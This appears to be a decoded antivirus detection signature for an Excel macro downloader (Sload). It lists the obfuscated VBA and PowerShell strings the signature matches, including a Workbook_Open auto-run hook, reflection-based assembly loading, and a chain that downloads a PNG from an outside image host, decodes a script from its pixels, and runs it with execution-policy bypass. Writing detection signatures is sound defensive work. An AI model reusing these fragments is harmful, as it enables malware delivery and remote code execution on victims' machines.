VIRUS NAME: Xls.Downloader.Sload-6923246-0
TDB: Engine:51-255,Target:2
LOGICAL EXPRESSION: 0&1&2&3&4&5&6&7
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function actualprice()
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function afilate()
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function immigration()
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Sub Workbook_Open()
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
actualprice = "'s','ste?m.','W','in????????????d?ow?s.','F?orm','Sy'  ) ) ; (  .('GV') (  \""{0}{1}{3}{2}\""-f '????????????ex?ec????????????uT','io?N','E????????????????x?t','C?ONt' ) -vA?lu?EOn?L  ).\""I`N?v??ok?eC??oMm`A??Nd\"".\""I???Nv??oK`E?sc`R??IPT\""(  (  [S??y?sT??em.W??IN??dO??wS?.F??oR?MS.cl??IpB?oAr??d]::(  \""{1}{0}\"" -f'XT',(\""{0}{1}\""-f 'g?et','te'  ) ).\""In???VO`K???E\""(   ))   )  ;   [S??ys???te??m.Wi????ndo??w?s.?Fo??rms.C??lipb??oar??d]::(  \""{1}{0}\""-f'r',(  \""{0}{1}\"" -f'Cl','ea' )).\""?I?n????v`Ok???e\""(  )"""
 * SUBSIG ID 5
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
babber = "??????C?????M??????d? ????/c?????                f^o?^r   ,  ;  ;  ;   ;   ;    ;  /^F  ;  ;    ,  ;  ,  ,    ,    ""   to?ke???ns=     1   de?l?i?ms=?af?B?pC?""   ,  ;   ;   ,    ;  ;  ;  ?%?b    ,  ,    ,   ,  ;    ;  ?^I?n   ;  ;   ;  ,  ;   ;  ;   (    ;    ;  ,  ,   ,  ;   ;   '  ,   ,  ;  ^^?F^^t?^^?Y^^P?^^E?   ;   ,  ;  ^|   ,  ,   ;   ,   ^^F^^i??nD^^s?T^^R   ;   ,  ,   ^^c?^^m     '  ,   ;  ,  ,    ,  ;  )  ;  ,   ,  ,   ;    ^d^O  ,  ;  ;  ;   ;  %b /c ""  e???Ch????O   ?SE?t? ('JR'+'K?A') ([T?y???pe]('M???at'+'?h') );  $0Wrn?f3=  [t????yP??E]('s'+'y???S'+'?t'+'eM.'+'TE??X??T.E????nco????DI??"
 * SUBSIG ID 6
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
bermudos = "??Fi??L -N??ol??oG?????????????????O -c???????    ${6`E9}= [Sy???st???e????????????????????????????????????????m.R???efl????ec???ti????on.A??????????????????????????????ss??emb???ly]::(  \""{1}{0}{3????????????????????????}{2}{4}\""-f 'W',(\""{0}{1}\""-f'Lo','ad'  ),'th','i',(  \""{1}{0}{3}{2}\"" -f'tialN','Par','e','am' )).\""In?V?`Oke\""(( \""{5}{1}{2}{3}{4}{0}\""-f "
 * SUBSIG ID 7
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
dayoffs = "(""{5}{3}{1}{0}{2}{4}""-f'e?m.','st','Dr','y','awi?ng.Bit?m???ap','S')((.('a') (""{1}{2}{0}"" -f 'eb???Cl??????ie?nt','Net','.W')).(""{1}{0}{2}"" -f 'e','Op','nRe??????????ad').I?nv????????ok??????????????e(""??????h???t????t???p????s??:/????/?????ima???ge???s2.im??gb??ox.c??om/3?6/b?6/FP0?V28Vz_?o.pn?g???????""));${o}=^^^&('a') (""{0}{1}"" -f 'B','yte[]') 1380;(0..2)^^^|^^^&('%'){foreach(${x} in(0..459)){${p}=${G}.(""{0}{1}"" -f 'G','etPixel').Invoke(${x},${_});${O}[${_}*460+${X}]=(  ( gE??T?-?Va???RIA??BLE  ('JR'+'ka')  ).VAl??UE::(""{0}{1}""-f 'Fl','oor').I?n??v?o?k?e?((${p}.""b""-ba?nd15)*16)-bor(${P}.""g"" -ba??nd 15))}};.('I'+'EX')(  $0wRNf3::""A?SC`iI"".""Ge?TS??Tr`I`Ng""(${O}[0..1056]))|cL??iP.e??x???e&&%P??UB?LI???C:~14%m??d /?c ?po??W??er??S???h?el?L? -s?t??A  -nO???nIn ? -w?i??Nd? 1 ? ?-?E?x?E?CUT??Ionp?oli???C ? ?b?Y??pA???S?S?? -N?O?P???RO??"
